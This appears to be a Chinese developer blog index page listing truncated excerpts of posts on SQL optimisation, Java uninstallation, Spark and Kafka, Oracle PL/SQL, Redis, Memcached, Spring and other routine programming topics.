    一.处理百万级以上的数据提高查询速度的方法:        1.应尽量避免在 where 子句中使用!=或<>操作符,否则将引擎放弃使用索引而进行全表扫描。         2.对查询进行优化,应尽量避免全表扫描,首先应考虑在 where 及 o
  • mac 卸载 java 1.7 或更高版本 征客丶 javaOS
    卸载 java 1.7 或更高 sudo rm -rf /Library/Internet\ Plug-Ins/JavaAppletPlugin.plugin 成功执行此命令后,还可以执行 java 与 javac 命令 sudo rm -rf /Library/PreferencePanes/JavaControlPanel.prefPane 成功执行此命令后,还可以执行 java
  • 【Spark六十一】Spark Streaming结合Flume、Kafka进行日志分析 bit1129 Stream
    第一步,Flume和Kakfa对接,Flume抓取日志,写到Kafka中 第二部,Spark Streaming读取Kafka中的数据,进行实时分析   本文首先使用Kakfa自带的消息处理(脚本)来获取消息,走通Flume和Kafka的对接 1. Flume配置 1. 下载Flume和Kafka集成的插件,下载地址:https://github.com/beyondj2ee/f
  • Erlang vs TNSDL bookjovi erlang
          TNSDL是Nokia内部用于开发电信交换软件的私有语言,是在SDL语言的基础上加以修改而成,TNSDL需翻译成C语言得以编译执行,TNSDL语言中实现了异步并行的特点,当然要完整实现异步并行还需要运行时动态库的支持,异步并行类似于Erlang的process(轻量级进程),TNSDL中则称之为hand,Erlang是基于vm(beam)开发,
  • 非常希望有一个预防疲劳的java软件, 预防过劳死和眼睛疲劳,大家一起努力搞一个 ljy325 企业应用
     非常希望有一个预防疲劳的java软件,我看新闻和网站,国防科技大学的科学家累死了,太疲劳,老是加班,不休息,经常吃药,吃药根本就没用,根本原因是疲劳过度。我以前做java,那会公司垃圾,老想赶快学习到东西跳槽离开,搞得超负荷,不明理。深圳做软件开发经常累死人,总有不明理的人,有个软件提醒限制很好,可以挽救很多人的生命。 相关新闻: (1)IT行业成五大疾病重灾区:过劳死平均37.9岁
  • 读《研磨设计模式》-代码笔记-原型模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /** * Effective Java 建议使用copy constructor or copy factory来代替clone()方法: * 1.public Product copy(Product p){} * 2.publi
  • 配置管理---svn工具之权限配置 chenyu19891124 SVN
    今天花了大半天的功夫,终于弄懂svn权限配置。下面是今天收获的战绩。 安装完svn后就是在svn中建立版本库,比如我本地的是版本库路径是C:\Repositories\pepos。pepos是我的版本库。在pepos的目录结构 pepos    component    webapps 在conf里面的auth里赋予的权限配置为 [groups]
  • 浅谈程序员的数学修养 comsci 设计模式编程算法面试招聘
                                     浅谈程序员的数学修养
  • 批量执行 bulk collect与forall用法 daizj oraclesqlbulk collectforall
    BULK COLLECT 子句会批量检索结果,即一次性将结果集绑定到一个集合变量中,并从SQL引擎发送到PL/SQL引擎。通常可以在SELECT INTO、 FETCH INTO以及RETURNING INTO子句中使用BULK COLLECT。本文将逐一描述BULK COLLECT在这几种情形下的用法。     有关FORALL语句的用法请参考:批量SQL之 F
  • Linux下使用rsync最快速删除海量文件的方法 dongwei_6688 OS
    1、先安装rsync:yum install rsync 2、建立一个空的文件夹:mkdir /tmp/test 3、用rsync删除目标目录:rsync --delete-before -a -H -v --progress --stats /tmp/test/ log/这样我们要删除的log目录就会被清空了,删除的速度会非常快。rsync实际上用的是替换原理,处理数十万个文件也是秒删。
  • Yii CModel中rules验证规格 dcj3sjt126com rulesyiivalidate
    Yii cValidator主要用法分析:  yii验证rulesit 分类: Yii yii的rules验证 cValidator主要属性 attributes ,builtInValidators,enableClientValidation,message,on,safe,skipOnError  
  • 基于vagrant的redis主从实验 dcj3sjt126com vagrant
    平台: Mac 工具: Vagrant 系统: Centos6.5 实验目的: Redis主从   实现思路 制作一个基于sentos6.5, 已经安装好reids的box, 添加一个脚本配置从机, 然后作为后面主机从机的基础box   制作sentos6.5+redis的box   mkdir vagrant_redis cd vagrant_
  • Memcached(二)、Centos安装Memcached服务器 frank1234 centosmemcached
    一、安装gcc rpm和yum安装memcached服务器连接没有找到,所以我使用的是make的方式安装,由于make依赖于gcc,所以要先安装gcc 开始安装,命令如下,[color=red][b]顺序一定不能出错[/b][/color]: 建议可以先切换到root用户,不然可能会遇到权限问题:su root 输入密码...... rpm -ivh kernel-head
  • Remove Duplicates from Sorted List hcx2013 remove
    Given a sorted linked list, delete all duplicates such that each element appear only once. For example,Given 1->1->2, return 1->2.Given 1->1->2->3->3, return&
  • Spring4新特性——JSR310日期时间API的支持 jinnianshilongnian spring4
    Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API  Spring4新
  • 浅谈enum与单例设计模式 247687009 java单例
    在JDK1.5之前的单例实现方式有两种(懒汉式和饿汉式并无设计上的区别故看做一种),两者同是私有构 造器,导出静态成员变量,以便调用者访问。 第一种 package singleton; public class Singleton { //导出全局成员 public final static Singleton INSTANCE = new S
  • 使用switch条件语句需要注意的几点 openwrt cbreakswitch
    1. 当满足条件的case中没有break,程序将依次执行其后的每种条件(包括default)直到遇到break跳出 int main() { int n = 1; switch(n) { case 1: printf("--1--\n"); default: printf("defa
  • 配置Spring Mybatis JUnit测试环境的应用上下文 schnell18 springmybatisJUnit
    Spring-test模块中的应用上下文和web及spring boot的有很大差异。主要试下来差异有: 单元测试的app context不支持从外部properties文件注入属性 @Value注解不能解析带通配符的路径字符串 解决第一个问题可以配置一个PropertyPlaceholderConfigurer的bean。 第二个问题的具体实例是:    
  • Java 定时任务总结一 tuoni javaspringtimerquartztimertask
     Java定时任务总结  一.从技术上分类大概分为以下三种方式:  1.Java自带的java.util.Timer类,这个类允许你调度一个java.util.TimerTask任务;   说明:    java.util.Timer定时器,实际上是个线程,定时执行TimerTask类 &
  • 一种防止用户生成内容站点出现商业广告以及非法有害等垃圾信息的方法 yangshangchuan rank相似度计算文本相似度词袋模型余弦相似度
    本文描述了一种在ITEYE博客频道上面出现的新型的商业广告形式及其应对方法,对于其他的用户生成内容站点类型也具有同样的适用性。   最近在ITEYE博客频道上面出现了一种新型的商业广告形式,方法如下:     1、注册多个账号(一般10个以上)。     2、从多个账号中选择一个账号,发表1-2篇博文
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他